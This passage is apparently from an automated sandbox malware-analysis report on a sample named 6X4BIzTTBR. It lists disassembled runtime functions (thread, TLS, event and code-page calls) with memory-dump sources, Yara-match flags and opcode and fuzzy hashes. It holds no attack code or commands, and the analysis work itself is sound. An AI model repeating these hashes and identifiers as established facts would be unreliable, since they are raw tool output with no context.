                                                      • Instruction Fuzzy Hash: D4F0A7B250131539F724B7765C06FBB37DC9B01755F54086AB955E7180FDA8F44442BC
                                                      Function 046ED084 Relevance: 6.0, APIs: 4, Instructions: 35threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 046ED098
                                                      • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 046ED0BC
                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 046ED0CF
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 046ED0DD
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
                                                      • String ID:
                                                      • API String ID: 3657713681-0
                                                      • Opcode ID: 91fe00c27762651b251d8766a9fdc76cd8d1da8bd6571df67899734432931397
                                                      • Instruction ID: 976b36a980c042185a68bc0cdfa995b11988ceae1dac6910067a20027a48b7c2
                                                      • Opcode Fuzzy Hash: 91fe00c27762651b251d8766a9fdc76cd8d1da8bd6571df67899734432931397
                                                      • Instruction Fuzzy Hash: B8F0E93550120467C724FE56E840C7EB7F99E90B18364455ED80517285FB36B94AC669
                                                      Function 00412601 Relevance: 6.0, APIs: 4, Instructions: 29registryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • RegisterWaitForSingleObject.KERNEL32(?,00000000,004235A2,000000A4,000000FF,0000000C), ref: 00412618
                                                      • GetLastError.KERNEL32(?,?,?,?,004185D9,?,?,?,?,00000000,?,00000000), ref: 00412627
                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041263D
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0041264B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
                                                      • String ID:
                                                      • API String ID: 3803302727-0
                                                      • Opcode ID: c7576253412bed51a53af5acb8f859d20b769276d3a1e4e3fae42923a132b8bd
                                                      • Instruction ID: 83bc2b2c86024c62be3f60ec6e25557cb0af9512207bfd9585c1e58ac0ecbfe1
                                                      • Opcode Fuzzy Hash: c7576253412bed51a53af5acb8f859d20b769276d3a1e4e3fae42923a132b8bd
                                                      • Instruction Fuzzy Hash: 54F0A03460010ABBCF01EFA5DE45EEF3768AB00705F600616B614E21E1EA78DA149B68
                                                      Function 046E2868 Relevance: 6.0, APIs: 4, Instructions: 29registryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • RegisterWaitForSingleObject.KERNEL32(?,00000000,004235A2,000000A4,000000FF,0000000C), ref: 046E287F
                                                      • GetLastError.KERNEL32(?,?,?,?,046E8840,?,?,?,?,00000000,?,00000000), ref: 046E288E
                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 046E28A4
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 046E28B2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
                                                      • String ID:
                                                      • API String ID: 3803302727-0
                                                      • Opcode ID: c7576253412bed51a53af5acb8f859d20b769276d3a1e4e3fae42923a132b8bd
                                                      • Instruction ID: 7286acd02852c8461b2bf073841a2722c5f623e2d4d1ac7684a653653c26f896
                                                      • Opcode Fuzzy Hash: c7576253412bed51a53af5acb8f859d20b769276d3a1e4e3fae42923a132b8bd
                                                      • Instruction Fuzzy Hash: B1F0A07550020ABBDF04EFA5CD44EAF37AC6B00605F640694B510E20E0EB74E60497A8
                                                      Function 046D5A7D Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • std::_Cnd_initX.LIBCPMT ref: 046D5A99
                                                      • __Cnd_signal.LIBCPMT ref: 046D5AA5
                                                      • std::_Cnd_initX.LIBCPMT ref: 046D5ABA
                                                      • __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 046D5AC1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
                                                      • String ID:
                                                      • API String ID: 2059591211-0
                                                      • Opcode ID: 4bc96931a50e530a97df949a93d6c22699e5ffe5761425610e17c207007b84ce
                                                      • Instruction ID: 2840da2cce294455ba411b6a7cf8d5ae4200353fd39f0b525cfe3bb543c61529
                                                      • Opcode Fuzzy Hash: 4bc96931a50e530a97df949a93d6c22699e5ffe5761425610e17c207007b84ce
                                                      • Instruction Fuzzy Hash: 0CF0E531801701ABF7317B71D80676A77E0AF4172DF14482DE0965A990FFFAB8448A5D
                                                      Function 00412326 Relevance: 6.0, APIs: 4, Instructions: 28COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • ___crtCreateEventExW.LIBCPMT ref: 0041233C
                                                      • GetLastError.KERNEL32(?,?,?,?,?,00410B49), ref: 0041234A
                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412360
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0041236E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
                                                      • String ID:
                                                      • API String ID: 200240550-0
                                                      • Opcode ID: 66fd49b5c43f77bbcd2fa95a93d23545e34cca56ab3752b45afdfddad9ffa28e
                                                      • Instruction ID: 7d54c7eb8c1df5617d0240cb21a080299d67000da4f0f446ba4d98586b5c168f
                                                      • Opcode Fuzzy Hash: 66fd49b5c43f77bbcd2fa95a93d23545e34cca56ab3752b45afdfddad9ffa28e
                                                      • Instruction Fuzzy Hash: 82E0D87160021A29E714B7768D03FBF369CAB00B45F54086BBE28E51C3FDACD51041AC
                                                      Function 046E258D Relevance: 6.0, APIs: 4, Instructions: 28COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • ___crtCreateEventExW.LIBCPMT ref: 046E25A3
                                                      • GetLastError.KERNEL32(?,?,?,?,?,046E0DB0), ref: 046E25B1
                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 046E25C7
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 046E25D5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
                                                      • String ID:
                                                      • API String ID: 200240550-0
                                                      • Opcode ID: 66fd49b5c43f77bbcd2fa95a93d23545e34cca56ab3752b45afdfddad9ffa28e
                                                      • Instruction ID: bd6f76cd608316a111380b91f6c817d2d725e90c983381b9bdbf8c8b3ac3b63a
                                                      • Opcode Fuzzy Hash: 66fd49b5c43f77bbcd2fa95a93d23545e34cca56ab3752b45afdfddad9ffa28e
                                                      • Instruction Fuzzy Hash: 90E0D861A0021A39F714B7758C22F7B36DC5B00A45F980895F954D61C1FA58F50441A8
                                                      Function 004192D9 Relevance: 6.0, APIs: 4, Instructions: 26memoryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00412702: TlsAlloc.KERNEL32(?,00410B49), ref: 00412708
                                                      • TlsAlloc.KERNEL32(?,00410B49), ref: 0042398F
                                                      • GetLastError.KERNEL32 ref: 004239A1
                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004239B7
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 004239C5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                      • String ID:
                                                      • API String ID: 3735082963-0
                                                      • Opcode ID: 4c0e1a6a312418bc90eef6f3fea79e88b9b6ce50c33034ee7117e387468c8eb0
                                                      • Instruction ID: 8833b9f6cd7e760378b88f767ee398d002a6a14adc7a97d59b2328b94074dca1
                                                      • Opcode Fuzzy Hash: 4c0e1a6a312418bc90eef6f3fea79e88b9b6ce50c33034ee7117e387468c8eb0
                                                      • Instruction Fuzzy Hash: F1E02BB45002205EC300BF76AD4A66E7274B5013067500E2FF051C2192EEBCD1894AAD
                                                      Function 046E9540 Relevance: 6.0, APIs: 4, Instructions: 26memoryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 046E2969: TlsAlloc.KERNEL32(?,046E0DB0), ref: 046E296F
                                                      • TlsAlloc.KERNEL32(?,046E0DB0), ref: 046F3BF6
                                                      • GetLastError.KERNEL32 ref: 046F3C08
                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 046F3C1E
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 046F3C2C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                      • String ID:
                                                      • API String ID: 3735082963-0
                                                      • Opcode ID: 4c0e1a6a312418bc90eef6f3fea79e88b9b6ce50c33034ee7117e387468c8eb0
                                                      • Instruction ID: 493e0f708939d063128a366351bfe1fa6376e2741f8256ca69cb0622df35d74c
                                                      • Opcode Fuzzy Hash: 4c0e1a6a312418bc90eef6f3fea79e88b9b6ce50c33034ee7117e387468c8eb0
                                                      • Instruction Fuzzy Hash: 1DE061B44003126FD304BF725C4457E32D86A00609B100E7AE651D32A0FE34F045465D
                                                      Function 0041253D Relevance: 6.0, APIs: 4, Instructions: 24COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetNumaHighestNodeNumber.KERNEL32(?,00000000,?,00410B49,?,?,?,00000000), ref: 00412547
                                                      • GetLastError.KERNEL32(?,?,?,00000000), ref: 00412556
                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041256C
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0041257A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
                                                      • String ID:
                                                      • API String ID: 3016159387-0
                                                      • Opcode ID: fca92cb7320ff50a6b90e81439df834d34dd5d4b89d2e23b0c713fa7ff00c28a
                                                      • Instruction ID: d1080d8484ae9d83b6d0ba61fc71b207615b60f889e64149bc2ecbf16b0e0fcc
                                                      • Opcode Fuzzy Hash: fca92cb7320ff50a6b90e81439df834d34dd5d4b89d2e23b0c713fa7ff00c28a
                                                      • Instruction Fuzzy Hash: 05E0487460010AABC714EBB5DE49AEF73BC7A00A45B600466A505E3151EA6CDB08877D
                                                      Function 046E27A4 Relevance: 6.0, APIs: 4, Instructions: 24COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetNumaHighestNodeNumber.KERNEL32(?,00000000,?,046E0DB0,?,?,?,00000000), ref: 046E27AE
                                                      • GetLastError.KERNEL32(?,?,?,00000000), ref: 046E27BD
                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 046E27D3
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 046E27E1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
                                                      • String ID:
                                                      • API String ID: 3016159387-0
                                                      • Opcode ID: fca92cb7320ff50a6b90e81439df834d34dd5d4b89d2e23b0c713fa7ff00c28a
                                                      • Instruction ID: 8850b9ac00f849e3330e2b8b981e2ffbfd33cbd699d00aaf11d518d8bb57d28c
                                                      • Opcode Fuzzy Hash: fca92cb7320ff50a6b90e81439df834d34dd5d4b89d2e23b0c713fa7ff00c28a
                                                      • Instruction Fuzzy Hash: 31E0DF7460120AA7DB04FBB28D49ABF33FC6A00A05B6004A5A101E3140FB28E6088779
                                                      Function 00412695 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • SetThreadPriority.KERNEL32(?,?), ref: 004126A1
                                                      • GetLastError.KERNEL32 ref: 004126AD
                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004126C3
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 004126D1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
                                                      • String ID:
                                                      • API String ID: 4286982218-0
                                                      • Opcode ID: e898cf3acbe9b392c8e56d8d93d4defc04798ac26e6527183b72e34242952ab8
                                                      • Instruction ID: 6d46e794ce675b14b4e777207d95778e75921e513829d010cf910108d867a6c0
                                                      • Opcode Fuzzy Hash: e898cf3acbe9b392c8e56d8d93d4defc04798ac26e6527183b72e34242952ab8
                                                      • Instruction Fuzzy Hash: A0E086346001197BCB14BF61DD06BFF776CBB00745B50082BB515D21A2EE7DD56486AC
                                                      Function 0041275B Relevance: 6.0, APIs: 4, Instructions: 23COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • TlsSetValue.KERNEL32(?,00000000,00417981,00000000,?,?,00410B49,?,?,?,00000000,?,00000000), ref: 00412767
                                                      • GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 00412773
                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412789
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00412797
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
                                                      • String ID:
                                                      • API String ID: 1964976909-0
                                                      • Opcode ID: 5eb4a781f3e4b8ec8f5daef76b0371c62c85b840ada855eb018d32e5272f8a37
                                                      • Instruction ID: fc0abd33e3506043c740cb9e36e94ef10b6ca8cd9ab3df5cd7633b5f59798732
                                                      • Opcode Fuzzy Hash: 5eb4a781f3e4b8ec8f5daef76b0371c62c85b840ada855eb018d32e5272f8a37
                                                      • Instruction Fuzzy Hash: 8AE086346001196BDB10BF61DD0ABFF77ACBF00745B50082AB515D21A2EE7DD56486EC
                                                      Function 046E28FC Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • SetThreadPriority.KERNEL32(?,?), ref: 046E2908
                                                      • GetLastError.KERNEL32 ref: 046E2914
                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 046E292A
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 046E2938
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
                                                      • String ID:
                                                      • API String ID: 4286982218-0
                                                      • Opcode ID: e898cf3acbe9b392c8e56d8d93d4defc04798ac26e6527183b72e34242952ab8
                                                      • Instruction ID: f10aab5882ace15e34ce8d04059a77030267e951774a396df2a32fd09f5b7018
                                                      • Opcode Fuzzy Hash: e898cf3acbe9b392c8e56d8d93d4defc04798ac26e6527183b72e34242952ab8
                                                      • Instruction Fuzzy Hash: ADE0867510011A77DB14BF72EC05BBB37AD6B00A45B5409A5B555D20A0FF35E104866C
                                                      Function 046E29C2 Relevance: 6.0, APIs: 4, Instructions: 23COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • TlsSetValue.KERNEL32(?,00000000,046E7BE8,00000000,?,?,046E0DB0,?,?,?,00000000,?,00000000), ref: 046E29CE
                                                      • GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 046E29DA
                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 046E29F0
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 046E29FE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
                                                      • String ID:
                                                      • API String ID: 1964976909-0
                                                      • Opcode ID: 5eb4a781f3e4b8ec8f5daef76b0371c62c85b840ada855eb018d32e5272f8a37
                                                      • Instruction ID: c073442372fc3e5f804781d2f9fa6defa117aa92a648f09cb287b268294d4680
                                                      • Opcode Fuzzy Hash: 5eb4a781f3e4b8ec8f5daef76b0371c62c85b840ada855eb018d32e5272f8a37
                                                      • Instruction Fuzzy Hash: 4BE0863510011A77EB14BF72DC09BBB37ED6F00645B540965BA59D60A0FB35F114969C
                                                      Function 00412702 Relevance: 6.0, APIs: 4, Instructions: 21memoryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • TlsAlloc.KERNEL32(?,00410B49), ref: 00412708
                                                      • GetLastError.KERNEL32 ref: 00412715
                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041272B
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00412739
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                      • String ID:
                                                      • API String ID: 3103352999-0
                                                      • Opcode ID: db4e8f81990c41efe0c5f892a1b43a96577a226854f9efbb8f129dbc0f0677bf
                                                      • Instruction ID: ae4cec7b8514c973035fdd40d9049bb060c9e6426e6cb98910bf6ccd7d8594f9
                                                      • Opcode Fuzzy Hash: db4e8f81990c41efe0c5f892a1b43a96577a226854f9efbb8f129dbc0f0677bf
                                                      • Instruction Fuzzy Hash: 7FE0C234500119678718BB75AE4AABF7368BA01759BA00A2BF171D21E2FFACD45846AC
                                                      Function 046E2969 Relevance: 6.0, APIs: 4, Instructions: 21memoryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • TlsAlloc.KERNEL32(?,046E0DB0), ref: 046E296F
                                                      • GetLastError.KERNEL32 ref: 046E297C
                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 046E2992
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 046E29A0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                      • String ID:
                                                      • API String ID: 3103352999-0
                                                      • Opcode ID: db4e8f81990c41efe0c5f892a1b43a96577a226854f9efbb8f129dbc0f0677bf
                                                      • Instruction ID: 3ec7eb9769e7b5ea2762ca4fda129351eb453d78a9c18263e194eaaa2b78dfad
                                                      • Opcode Fuzzy Hash: db4e8f81990c41efe0c5f892a1b43a96577a226854f9efbb8f129dbc0f0677bf
                                                      • Instruction Fuzzy Hash: 22E0C230000116679718BB76AC58ABB72AD6B01719BA40BA9E1A1D30E0FB68E00842AC
                                                      Function 0042F08D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __startOneArgErrorHandling.LIBCMT ref: 0042F11D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: ErrorHandling__start
                                                      • String ID: pow
                                                      • API String ID: 3213639722-2276729525
                                                      • Opcode ID: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
                                                      • Instruction ID: 8e169e9360580ca493d47f0c0c757dc5712737ee0a62320f354c2119d5e44c11
                                                      • Opcode Fuzzy Hash: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
                                                      • Instruction Fuzzy Hash: 1C515C61B04302D6CB117714E94137BA7A0EB54B00FE4597FF4D1823A9EE2E8CA99A4F
                                                      Function 0043AE79 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0043B0D4,?,00000050,?,?,?,?,?), ref: 0043AF54
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ACP$OCP
                                                      • API String ID: 0-711371036
                                                      • Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                      • Instruction ID: 2243d02fd8148dd9ec2f33991059bb206d05c053167233329e98fe35075abcd7
                                                      • Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                      • Instruction Fuzzy Hash: BC2138A2AC0100A6DB30CB64C906B977396EB6CB15F529526E98AC7300F73ADD21C35E
                                                      Function 0470B0E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0470B33B,?,00000050,?,?,?,?,?), ref: 0470B1BB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ACP$OCP
                                                      • API String ID: 0-711371036
                                                      • Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                      • Instruction ID: 4de484fff4201c174cbf6a1e7399986b03c35813abd28c86d7579958c4c4c986
                                                      • Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                      • Instruction Fuzzy Hash: 40219D62B42204E6EB249FA5CD01BA763EAEF44B50F46C424E909D7389F732FB00C394
                                                      Function 00401F17 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 00401F32
                                                      • GdipGetImageEncoders.GDIPLUS(?,?,00000000), ref: 00401F57
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: EncodersGdipImage$Size
                                                      • String ID: image/png
                                                      • API String ID: 864223233-2966254431
                                                      • Opcode ID: 46e06415d47cef216651a1ceb0941a1122d06094d99f4b809e1aea25a43a6a14
                                                      • Instruction ID: 1ac231c862dfa1d4f9d2a87bc7d89be22634d28e92dbc51b0da411a030b342b9
                                                      • Opcode Fuzzy Hash: 46e06415d47cef216651a1ceb0941a1122d06094d99f4b809e1aea25a43a6a14
                                                      • Instruction Fuzzy Hash: 7B119476D0010AAFCB119FA59C4149EBB75FF41361B60027BEC10B31A0CB795E559A58
                                                      Function 046DF1A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetLastError.KERNEL32(0000000D,?,046DE0BE,046DC8D6,?,?,00000000,?,046DC7A6,0045D5E4,0040C50C,0045D5DC,?,ios_base::failbit set,046DC8D6), ref: 046DF227
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast
                                                      • String ID: "1@
                                                      • API String ID: 1452528299-1946750398
                                                      • Opcode ID: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                      • Instruction ID: b8ed01cabe733cfee4f018d0aa0cf28ad2f4a5d7e5f8f4d2f523b9a6bc52217c
                                                      • Opcode Fuzzy Hash: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                      • Instruction Fuzzy Hash: 0411E536B00126AFCF1A5FA0DC4456AFB65FF0D715B104039F917D6210EA71A911DBD0
